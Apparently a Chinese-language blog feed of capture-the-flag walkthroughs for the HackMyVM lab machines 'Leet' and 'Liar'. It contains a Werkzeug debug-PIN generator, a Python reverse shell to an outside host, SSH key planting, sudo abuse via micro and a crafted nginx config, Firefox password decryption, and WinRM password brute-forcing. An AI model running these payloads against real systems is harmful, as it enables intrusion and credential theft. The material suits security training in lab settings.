for bit in chain(probably_public_bits, private_bits):
        if not bit:
                continue
        if isinstance(bit, str):
                bit = bit.encode('utf-8')
        h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
        h.update(b'pinsalt')
        num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
        for group_size in 5, 4, 3:
                if len(num) % group_size == 0:
                        rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                                                  for x in range(0, len(num), group_size))
                        break
        else:
                rv = num

print("Pin: " + rv)

死活失败

我参考了其他大佬的WP，发现其余都是不变的，变化的只有网卡的MAC地址

换了个环境，在此环境下VirtualBox版本为6.0.14，导入靶机时默认设置

生成的pin码即可验证通过

/console

控制台已被锁定，需要输入 PIN 才能解锁。你可以在运行该服务器的 shell 的标准输出中找到打印出来的 PIN。

输入pin码进入

一个python命令框

直接反弹shell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.106",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")

提权

提权-riva

(remote) www-data@leet.hmv:/$ sudo -l
Matching Defaults entries for www-data on leet:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User www-data may run the following commands on leet:
    (riva) NOPASSWD: /usr/bin/micro

Ctrl+b可以打开shell

直接输入/bin/sh即可

提权root

升级tty

python3 -c 'import pty; pty.spawn("/bin/bash")'

riva@leet:~$ cat user.txt 
3a5cf7b35876169c280229c213ed63c1

sudo -l
需要密码


curl http://192.168.0.106:8888/authorized_keys.pub -o /home/riva/.ssh/authorized_keys

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# ssh riva@192.168.0.101 -i authorized_keys                
The authenticity of host '192.168.0.101 (192.168.0.101)' can't be established.
ED25519 key fingerprint is SHA256:V0kY0pxHYgYYJeQXQGSoUclaPX71KqkFTnqjTNaj/Qk.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:41: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.101' (ED25519) to the list of known hosts.
Linux leet.hmv 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
/bin/bash: connect: Connection refused
/bin/bash: line 1: /dev/tcp/192.168.0.106/4444: Connection refused
riva@leet:~$

火狐取密

riva@leet:~$ dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                            Version                        Architecture Description
+++-===============================-==============================-============-===========================>
ii  adduser                         3.134                          all          add and remove users and gr>
rc  adwaita-icon-theme              43-1                           all          default icon theme of GNOME
ii  alsa-topology-conf              1.2.5.1-2                      all          ALSA topology configuration>
ii  alsa-ucm-conf                   1.2.8-1                        all          ALSA Use Case Manager confi>
ii  anacron                         2.3-36                         amd64        cron-like program that does>
rc  apache2                         2.4.57-2                       amd64        Apache HTTP Server
ii  apparmor                        3.0.8-3                        amd64        user-space parser utility f>
ii  apt                             2.6.1                          amd64        commandline package manager
ii  apt-listchanges                 3.24                           all          package change history noti>
ii  apt-utils                       2.6.1                          amd64        package management related >
ii  aspell                          0.60.8-4+b1                    amd64        GNU Aspell spell-checker
ii  aspell-fr                       0.50-3-8.1                     all          French dictionary for aspell
rc  at-spi2-core                    2.46.0-5                       amd64        Assistive Technology Servic>
ii  avahi-autoipd                   0.8-10                         amd64        Avahi IPv4LL network addres>
ii  base-files                      12.4+deb12u5                   amd64        Debian base system miscella>
ii  base-passwd                     3.6.1                          amd64        Debian base system master p>
ii  bash                            5.2.15-2+b2                    amd64        GNU Bourne Again SHell
ii  bash-completion                 1:2.11-6                       all          programmable completion for>
ii  bind9-dnsutils                  1:9.18.24-1                    amd64        Clients provided with BIND 9
ii  bind9-host                      1:9.18.24-1                    amd64        DNS Lookup Utility
ii  bind9-libs:amd64                1:9.18.24-1                    amd64        Shared Libraries used by BI>
ii  binutils                        2.40-2                         amd64        GNU assembler, linker and b>
ii  binutils-common:amd64           2.40-2                         amd64        Common files for the GNU as>
ii  binutils-x86-64-linux-gnu       2.40-2                         amd64        GNU binary utilities, for x>
ii  bluetooth                       5.66-1+deb12u1                 all          Bluetooth support (metapack>
ii  bluez                           5.66-1+deb12u1                 amd64        Bluetooth tools and daemons
ii  bsdextrautils                   2.38.1-5+deb12u1               amd64        extra utilities from 4.4BSD>
ii  bsdutils                        1:2.38.1-5+deb12u1             amd64        basic utilities from 4.4BSD>
ii  busybox                         1:1.35.0-4+b3                  amd64        Tiny utilities for small an>
ii  bzip2                           1.0.8-5+b1                     amd64        high-quality block-sorting >
ii  ca-certificates                 20230311                       all          Common CA certificates
ii  console-setup                   1.221                          all          console font and keymap set>
ii  console-setup-linux             1.221                          all          Linux specific part of cons>
ii  coreutils                       9.1-1                          amd64        GNU core utilities
ii  cpio                            2.13+dfsg-7.1                  amd64        GNU cpio -- a program to ma>
ii  cpp                             4:12.2.0-3                     amd64        GNU C preprocessor (cpp)
ii  cpp-12                          12.2.0-14                      amd64        GNU C preprocessor
ii  cron                            3.0pl1-162                     amd64        process scheduling daemon
ii  cron-daemon-common              3.0pl1-162                     all          process scheduling daemon's>
ii  curl                            7.88.1-10+deb12u5              amd64        command line tool for trans>
ii  dash                            0.5.12-2                       amd64        POSIX-compliant shell
ii  dbus                            1.14.10-1~deb12u1              amd64        simple interprocess messagi>
ii  dbus-bin                        1.14.10-1~deb12u1              amd64        simple interprocess messagi>
ii  dbus-daemon                     1.14.10-1~deb12u1              amd64        simple interprocess messagi>
ii  dbus-session-bus-common         1.14.10-1~deb12u1              all          simple interprocess messagi>
ii  dbus-system-bus-common          1.14.10-1~deb12u1              all          simple interprocess messagi>
ii  dbus-user-session               1.14.10-1~deb12u1              amd64        simple interprocess messagi>
ii  debconf                         1.5.82                         all          Debian configuration manage>
ii  debconf-i18n                    1.5.82                         all          full internationalization s>
ii  debian-archive-keyring          2023.3+deb12u1                 all          GnuPG archive keys of the D>
ii  debian-faq                      11.1                           all          Debian Frequently Asked Que>
ii  debianutils                     5.7-0.5~deb12u1                amd64        Miscellaneous utilities spe>
ii  dictionaries-common             1.29.5                         all          spelling dictionaries - com>
ii  diffutils                       1:3.8-4                        amd64        File comparison utilities
ii  dirmngr                         2.2.40-1.1                     amd64        GNU privacy guard - network>
ii  discover                        2.1.2-10                       amd64        hardware identification sys>
ii  discover-data                   2.2013.01.13                   all          Data lists for Discover har>
ii  distro-info-data                0.58+deb12u1                   all          information about the distr>
ii  dmidecode                       3.4-1                          amd64        SMBIOS/DMI table decoder
ii  dmsetup                         2:1.02.185-2                   amd64        Linux Kernel Device Mapper >
ii  doc-debian                      11.3+nmu1                      all          Debian Project documentatio>
ii  dpkg                            1.21.22                        amd64        Debian package management s>
ii  dpkg-dev                        1.21.22                        all          Debian package development >
ii  e2fsprogs                       1.47.0-2                       amd64        ext2/ext3/ext4 file system >
ii  eject                           2.38.1-5+deb12u1               amd64        ejects CDs and operates CD->
ii  emacsen-common                  3.0.5                          all          Common facilities for all e>
ii  fakeroot                        1.31-1.2                       amd64        tool for simulating superus>
ii  fdisk                           2.38.1-5+deb12u1               amd64        collection of partitioning >
ii  file                            1:5.44-3                       amd64        Recognize the type of data >
ii  findutils                       4.9.0-4                        amd64        utilities for finding files>
rc  firefox-esr                     115.7.0esr-1~deb12u1           amd64        Mozilla Firefox web browser>

发现了firefox-esr

https://github.com/unode/firefox_decrypt

使用工具

riva@leet:~$ ls -la
total 40
drwxr-xr-x 6 riva riva 4096 Feb 14 21:00 .
drwxr-xr-x 3 root root 4096 Feb 14 21:00 ..
lrwxrwxrwx 1 riva riva    9 Feb 11 15:58 .bash_history -> /dev/null
-rw-r--r-- 1 riva riva  220 Feb 14 21:00 .bash_logout
-rw-r--r-- 1 riva riva 3526 Feb 14 21:00 .bashrc
drwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .config
drwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .local
drwx------ 4 riva riva 4096 Feb 14 21:00 .mozilla
-rw-r--r-- 1 riva riva  807 Feb 14 21:00 .profile
drwx------ 2 riva riva 4096 Feb 14 21:00 .ssh
-rwx------ 1 riva riva   33 Feb 14 21:00 user.txt
riva@leet:~$ cd .mozilla/
riva@leet:~/.mozilla$ ls -la
total 16
drwx------ 4 riva riva 4096 Feb 14 21:00 .
drwxr-xr-x 6 riva riva 4096 Feb 14 21:00 ..
drwx------ 2 riva riva 4096 Feb 14 21:00 extensions
drwx------ 6 riva riva 4096 Feb 14 21:00 firefox
riva@leet:~/.mozilla$ cd firefox/
riva@leet:~/.mozilla/firefox$ ls -la
total 32
drwx------  6 riva riva 4096 Feb 14 21:00  .
drwx------  4 riva riva 4096 Feb 14 21:00  ..
drwx------  3 riva riva 4096 Feb 14 21:00 'Crash Reports'
drwx------ 16 riva riva 4096 Feb 14 21:00  guu30cui.default-esr
-rw-r--r--  1 riva riva   58 Feb 14 21:00  installs.ini
drwx------  2 riva riva 4096 Feb 14 21:00 'Pending Pings'
-rw-r--r--  1 riva riva  247 Feb 14 21:00  profiles.ini
drwx------  2 riva riva 4096 Feb 14 21:00  zbznfk37.default

riva@leet:~/.mozilla/firefox$ cd /tmp
riva@leet:/tmp$ vi firefox_decrypt.py
riva@leet:/tmp$ chmod +x firefox_decrypt.py 
riva@leet:/tmp$ python3 -V
Python 3.11.2
riva@leet:/tmp$ python3 firefox_decrypt.py 
Select the Mozilla profile you wish to decrypt
1 -> zbznfk37.default
2 -> guu30cui.default-esr
1
2024-07-01 12:35:59,994 - ERROR - Couldn't initialize NSS, maybe '/home/riva/.mozilla/firefox/zbznfk37.default' is not a valid profile?
riva@leet:/tmp$ python3 firefox_decrypt.py 
Select the Mozilla profile you wish to decrypt
1 -> zbznfk37.default
2 -> guu30cui.default-esr
2

Website:   chrome://FirefoxAccounts
Username: '1db9561103ca4adc9afa6357c0a0b554'
Password: '{"version":1,"accountData":{"scopedKeys":{"https://identity.mozilla.com/apps/oldsync":{"kid":"1603273389635-IxsZ6HpGK9fL9tUfdcBqwA","k":"Q8lFF-E91kvogabSQ2yjKj7k2JHX30UDeHEriaxaCY5slUVmtQvP-e3is5GxBiUKkG3g4dQLbFRsVOYeMkjNpg","kty":"oct"},"sync:addon_storage":{"kid":"1603273389635-Ng9dJrdpVFqEoBs-R3LaTMKTiSWhWypqfmg9MJDby4U","k":"L8MGJk3tWVlmN9Sm-MmdauxuQ38fIl--NziTjg_AmjO51_-vHo70OELMwif8kqn2zE3Yqg30BLw1ndNplRzGCA","kty":"oct"}},"kSync":"43c94517e13dd64be881a6d2436ca32a3ee4d891d7df450378712b89ac5a098e6c954566b50bcff9ede2b391b106250a906de0e1d40b6c546c54e61e3248cda6","kXCS":"231b19e87a462bd7cbf6d51f75c06ac0","kExtSync":"2fc306264ded59596637d4a6f8c99d6aec6e437f1f225fbe3738938e0fc09a33b9d7ffaf1e8ef43842ccc227fc92a9f6cc4dd8aa0df404bc359dd369951cc608","kExtKbHash":"360f5d26b769545a84a01b3e4772da4cc2938925a15b2a6a7e683d3090dbcb85"}}'

Website:   http://leet.hmv
Username: 'riva'
Password: 'PGH$2r0co3L5QL'

Website:   https://hackmyvm.eu
Username: 'riva'
Password: 'lovelove80'

riva/PGH$2r0co3L5QL

riva@leet:/tmp$ sudo -l
[sudo] password for riva: 
Matching Defaults entries for riva on leet:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User riva may run the following commands on leet:
    (root) /usr/sbin/nginx

nginx提权

https://gist.github.com/DylanGrl/ab497e2f01c7d672a80ab9561a903406

riva@leet:/tmp$ cat << EOF > /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
        server {
                listen 1339;
                root /;
                autoindex on;
                dav_methods PUT;
        }
}
EOF
riva@leet:/tmp$ cat /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
        server {
                listen 1339;
                root /;
                autoindex on;
                dav_methods PUT;
        }
}
riva@leet:/tmp$ sudo -u root nginx -c /tmp/nginx_pwn.conf
2026/01/14 18:08:38 [emerg] 1355#1355: bind() to 0.0.0.0:1339 failed (98: Address already in use)
2026/01/14 18:08:38 [emerg] 1355#1355: bind() to 0.0.0.0:1339 failed (98: Address already in use)
2026/01/14 18:08:38 [emerg] 1355#1355: bind() to 0.0.0.0:1339 failed (98: Address already in use)
2026/01/14 18:08:38 [emerg] 1355#1355: bind() to 0.0.0.0:1339 failed (98: Address already in use)
2026/01/14 18:08:38 [emerg] 1355#1355: bind() to 0.0.0.0:1339 failed (98: Address already in use)
2026/01/14 18:08:38 [emerg] 1355#1355: still could not bind()
riva@leet:/tmp$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/riva/.ssh/id_rsa): root_shell
root_shell already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in root_shell
Your public key has been saved in root_shell.pub
The key fingerprint is:
SHA256:ADl9vd+/FbVOFBjgrTGIR2yHSuBhWKzVhdtqFG7XqS8 riva@leet.hmv
The key's randomart image is:
+---[RSA 3072]----+
|    =Bo ++....o. |
|   .=+o=+++...  .|
|    oo+o*oo=.. ..|
|   .   B.o.o+ . o|
|      o S .o . + |
|       o .  . + .|
|      .   .    o.|
|         E .    o|
|          .    ..|
+----[SHA256]-----+

riva@leet:/tmp$ cat root_shell.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCZU+DMPbpynDPmpaLMiHKN9HBd+nH4pqVYIJ66gdkSW+eOSRKWmn9lHm2O1QxjtN8HXvWGjIsdqcqEFRau2MlfaEyh6oViMZ3P7Vhyl1I1EQ9epwoxW4dr7upOcQYCMutird+Uz1/v5qQphAZtBQ1qkjs3bfWXtd4QukQVZJJyPVYai9JFXwBccxP/jLva01fb/0XPRFMoSIqswDe5eyh1vFSwXYsoK3EeNrRR8K2woS6AtOQGJ+CzepjaT93Zzq95sk4rF+ZQ8B6MeyOiB3cEBDxBLg8RQlxHc7R8P0ZNEyMiy2gfN/HQKt+mxbAE/iAht4xLCbyHAuIykuNEm2pYBZycPLZlRNMKYMAkifoPlsQOwXRgjEbJZtbp2mVBgDLSV0hkLYXrTYet8PkmI1QQmqcBgXAhLmnTj/cxbgUNY9n79qQ6trva9hs1Fi+GZBh6mW1YmWWHvyjYZ75F5Q1TB9rWM7goeT4N59LVz4+trdK11wGFZnXWHVpLyDMk5Fk= riva@leet.hmv
riva@leet:/tmp$ curl -X PUT localhost:1339/root/.ssh/authorized_keys -d "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCZU+DMPbpynDPmpaLMiHKN9HBd+nH4pqVYIJ66gdkSW+eOSRKWmn9lHm2O1QxjtN8HXvWGjIsdqcqEFRau2MlfaEyh6oViMZ3P7Vhyl1I1EQ9epwoxW4dr7upOcQYCMutird+Uz1/v5qQphAZtBQ1qkjs3bfWXtd4QukQVZJJyPVYai9JFXwBccxP/jLva01fb/0XPRFMoSIqswDe5eyh1vFSwXYsoK3EeNrRR8K2woS6AtOQGJ+CzepjaT93Zzq95sk4rF+ZQ8B6MeyOiB3cEBDxBLg8RQlxHc7R8P0ZNEyMiy2gfN/HQKt+mxbAE/iAht4xLCbyHAuIykuNEm2pYBZycPLZlRNMKYMAkifoPlsQOwXRgjEbJZtbp2mVBgDLSV0hkLYXrTYet8PkmI1QQmqcBgXAhLmnTj/cxbgUNY9n79qQ6trva9hs1Fi+GZBh6mW1YmWWHvyjYZ75F5Q1TB9rWM7goeT4N59LVz4+trdK11wGFZnXWHVpLyDMk5Fk= riva@leet.hmv"
riva@leet:/tmp$ ssh root@0.0.0.0 -i root_shell 
Linux leet.hmv 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 28 17:37:49 2024 from 192.168.0.178
root@leet:~#

root@leet:~# cat r007_fl46.7x7 
ca169772acb099a02ebab8da1d9070ea

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/leet/

HMV-Liar

呼啸山庄 — Thu, 15 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(web)─(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"

192.168.0.103   08:00:27:e2:94:78       (Unknown)

nmap扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 06:42 EST
Nmap scan report for 192.168.0.103
Host is up (0.00032s latency).
Not shown: 65524 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                
|_http-title: Not Found                                                                                              
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                          
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                
|_http-title: Not Found                                                                                              
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                          
49664/tcp open  msrpc         Microsoft Windows RPC                                                                  
49665/tcp open  msrpc         Microsoft Windows RPC                                                                  
49666/tcp open  msrpc         Microsoft Windows RPC                                                                  
49667/tcp open  msrpc         Microsoft Windows RPC                                                                  
49668/tcp open  msrpc         Microsoft Windows RPC                                                                  
49679/tcp open  msrpc         Microsoft Windows RPC                                                                  
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows                                                             
                                                                                                                     
Host script results:                                                                                                 
| smb2-time:                                                                                                         
|   date: 2026-01-15T11:45:44                                                                                        
|_  start_date: N/A                                                                                                  
|_clock-skew: 2s                                                                                                     
| smb2-security-mode:                                                                                                
|   3:1:1:                                                                                                           
|_    Message signing enabled but not required                                                                       
|_nbstat: NetBIOS name: WIN-IURF14RBVGV, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:e2:94:78 (Oracle VirtualBox virtual NIC)                                                                                                          
                                                                                                                     
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                       
Nmap done: 1 IP address (1 host up) scanned in 194.94 seconds

80端口

┌──(web)─(root㉿kali)-[/home/kali]
└─# dirsearch -u http://192.168.0.103/

  _|. _ _  _  _  _ _|_    v0.4.3.post1   
 (_||| _) (/_(_|| (_| )                  
                                         
Extensions: php, aspx, jsp, html, js
HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.0.103/__26-01-15_06-47-40.txt

Target: http://192.168.0.103/

[06:47:40] Starting:                     
[06:47:41] 403 -  312B  - /%2e%2e//google.com                                     
[06:47:41] 403 -  312B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd                   
[06:47:45] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd                 
[06:47:57] 403 -  312B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd           

Task Completed

enum4linux

┌──(web)─(root㉿kali)-[/home/kali]
└─# enum4linux 192.168.0.103
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jan 15 06:53:12 2026

 =========================================( Target Information )=========================================                  
                                         
Target ........... 192.168.0.103         
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.0.103 )===========================                   
                                         
                                         
[+] Got domain/workgroup name: WORKGROUP 
                                         
                                         
 ===============================( Nbtstat Information for 192.168.0.103 )===============================                   
                                         
Looking up status of 192.168.0.103       
        WIN-IURF14RBVGV <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WIN-IURF14RBVGV <20> -         B <ACTIVE>  File Server Service

        MAC Address = 08-00-27-E2-94-78

 ===================================( Session Check on 192.168.0.103 )===================================                  
                                         
                                         
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

smbclient

┌──(web)─(root㉿kali)-[/home/kali]
└─# smbclient -L 192.168.0.103 -N
session setup failed: NT_STATUS_ACCESS_DENIED

漏洞利用

http://192.168.0.102

Hey bro, You asked for an easy Windows VM, enjoy it. - nica

得到用户nica

密码爆破

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# crackmapexec winrm 192.168.0.102 -u nica -p ../tools/wordlists/kali/rockyou.txt

...
WINRM       192.168.0.102   5985   WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\nica:hardcore (Pwn3d!)

成功获得凭据nica/hardcore

当然用smb爆破同效

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# crackmapexec smb 192.168.0.102 -u nica -p ../tools/wordlists/kali/rockyou.txt

...
SMB         192.168.0.102   445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\nica:hardcore

二次信息收集

evil-winrm

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# evil-winrm -i 192.168.0.102 -u nica -p hardcore

                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                          
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                     
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nica\Documents> cd ../
*Evil-WinRM* PS C:\Users\nica> dir


    Directorio: C:\Users\nica


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/15/2018   9:12 AM                Desktop
d-r---        9/26/2023   6:44 PM                Documents
d-r---        9/15/2018   9:12 AM                Downloads
d-r---        9/15/2018   9:12 AM                Favorites
d-r---        9/15/2018   9:12 AM                Links
d-r---        9/15/2018   9:12 AM                Music
d-r---        9/15/2018   9:12 AM                Pictures
d-----        9/15/2018   9:12 AM                Saved Games
d-r---        9/15/2018   9:12 AM                Videos
-a----        9/26/2023   6:44 PM             10 user.txt
*Evil-WinRM* PS C:\Users\nica> type user.txt
HMVWINGIFT

enum4linux

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# enum4linux -a -u "nica" -p "hardcore" 192.168.0.102
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jan 16 20:08:50 2026

 =========================================( Target Information )=========================================

Target ........... 192.168.0.102
RID Range ........ 500-550,1000-1050
Username ......... 'nica'
Password ......... 'hardcore'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.0.102 )===========================
                                                                                     
                                                                                     
[+] Got domain/workgroup name: WORKGROUP                                             
                                                                                     
                                                                                     
 ===============================( Nbtstat Information for 192.168.0.102 )===============================                                                                  
                                                                                     
Looking up status of 192.168.0.102                                                   
        WIN-IURF14RBVGV <20> -         B <ACTIVE>  File Server Service
        WIN-IURF14RBVGV <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

        MAC Address = 08-00-27-27-6D-2C

 ===================================( Session Check on 192.168.0.102 )===================================                                                                 
                                                                                     
                                                                                     
[+] Server 192.168.0.102 allows sessions using username 'nica', password 'hardcore'  
                                                                                     
                                                                                     
 ================================( Getting domain SID for 192.168.0.102 )================================                                                                 
                                                                                     
Domain Name: WORKGROUP                                                               
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup                 
                                                                                     
                                                                                     
 ==================================( OS information on 192.168.0.102 )==================================                                                                  
                                                                                     
                                                                                     
[E] Can't get OS info with smbclient                                                 
                                                                                     
                                                                                     
[+] Got OS info for 192.168.0.102 from srvinfo:                                      
        192.168.0.102  Wk Sv NT SNT                                                  
        platform_id     :       500
        os version      :       10.0
        server type     :       0x9003


 =======================================( Users on 192.168.0.102 )=======================================                                                                 
                                                                                     
Use of uninitialized value $users in print at ./enum4linux.pl line 972.              
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

 =================================( Share Enumeration on 192.168.0.102 )=================================                                                                 
                                                                                     
do_connect: Connection to 192.168.0.102 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Admin remota
        C$              Disk      Recurso predeterminado
        IPC$            IPC       IPC remota
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.0.102                                        
                                                                                     
//192.168.0.102/ADMIN$  Mapping: DENIED Listing: N/A Writing: N/A                    
//192.168.0.102/C$      Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:                                                       
                                                                                     
NT_STATUS_NO_SUCH_FILE listing \*                                                    
//192.168.0.102/IPC$    Mapping: N/A Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 192.168.0.102 )===========================                                                                  
                                                                                     
                                                                                     
[E] Unexpected error from polenum:                                                   
                                                                                     
                                                                                     

[+] Attaching to 192.168.0.102 using nica:hardcore

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:192.168.0.102)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: rpc_s_access_denied



[E] Failed to get password policy with rpcclient                                     
                                                                                     
                                                                                     

 ======================================( Groups on 192.168.0.102 )======================================                                                                  
                                                                                     
                                                                                     
[+] Getting builtin groups:                                                          
                                                                                     
                                                                                     
[+]  Getting builtin group memberships:                                              
                                                                                     
                                                                                     
[+]  Getting local groups:                                                           
                                                                                     
                                                                                     
[+]  Getting local group memberships:                                                
                                                                                     
                                                                                     
[+]  Getting domain groups:                                                          
                                                                                     
                                                                                     
[+]  Getting domain group memberships:                                               
                                                                                     
                                                                                     
 ==================( Users on 192.168.0.102 via RID cycling (RIDS: 500-550,1000-1050) )==================                                                                 
                                                                                     
                                                                                     
[I] Found new SID:                                                                   
S-1-5-32                                                                             

[I] Found new SID:                                                                   
S-1-5-32                                                                             

[I] Found new SID:                                                                   
S-1-5-32                                                                             

[I] Found new SID:                                                                   
S-1-5-32                                                                             

[I] Found new SID:                                                                   
S-1-5-32                                                                             

[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'nica', password 'hardcore'                                        
                                                                                     
                                                                                     
[+] Enumerating users using SID S-1-5-90 and logon username 'nica', password 'hardcore'                                                                                   
                                                                                     
                                                                                     
[+] Enumerating users using SID S-1-5-32 and logon username 'nica', password 'hardcore'                                                                                   
                                                                                     
S-1-5-32-544 BUILTIN\Administradores (Local Group)                                   
S-1-5-32-545 BUILTIN\Usuarios (Local Group)
S-1-5-32-546 BUILTIN\Invitados (Local Group)
S-1-5-32-547 BUILTIN\Usuarios avanzados (Local Group)
S-1-5-32-550 BUILTIN\Opers. de impresión (Local Group)

[+] Enumerating users using SID S-1-5-80 and logon username 'nica', password 'hardcore'                                                                                   
                                                                                     
                                                                                     
[+] Enumerating users using SID S-1-5-82-3006700770-424185619-1745488364-794895919 and logon username 'nica', password 'hardcore'                                         
                                                                                     
                                                                                     
 ===============================( Getting printer info for 192.168.0.102 )===============================                                                                 
                                                                                     
do_cmd: Could not initialise spoolss. Error was NT_STATUS_OBJECT_NAME_NOT_FOUND      


enum4linux complete on Fri Jan 16 20:09:13 2026

winPEAS

*Evil-WinRM* PS C:\Users\nica\Documents> upload ../../../../../../home/kali/Desktop/tools/peass/winpeas/winPEASx64.exe
                                        
Info: Uploading /home/kali/Desktop/hmv/../../../../../../home/kali/Desktop/tools/peass/winpeas/winPEASx64.exe to C:\Users\nica\Documents\winPEASx64.exe                   
                                        
Data: 13561172 bytes of 13561172 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\nica\Documents> .\winPEASx64.exe 
*Evil-WinRM* PS C:\Users\nica\Documents> .\winPEASx64.exe quiet
*Evil-WinRM* PS C:\Users\nica\Documents> 

*Evil-WinRM* PS C:\Users\nica\Documents> upload ../../../../../../home/kali/Desktop/tools/peass/winpeas/winPEAS.ps1
                                        
Info: Uploading /home/kali/Desktop/hmv/../../../../../../home/kali/Desktop/tools/peass/winpeas/winPEAS.ps1 to C:\Users\nica\Documents\winPEAS.ps1                         
                                        
Data: 108048 bytes of 108048 bytes copied
                                        
Info: Upload successful!

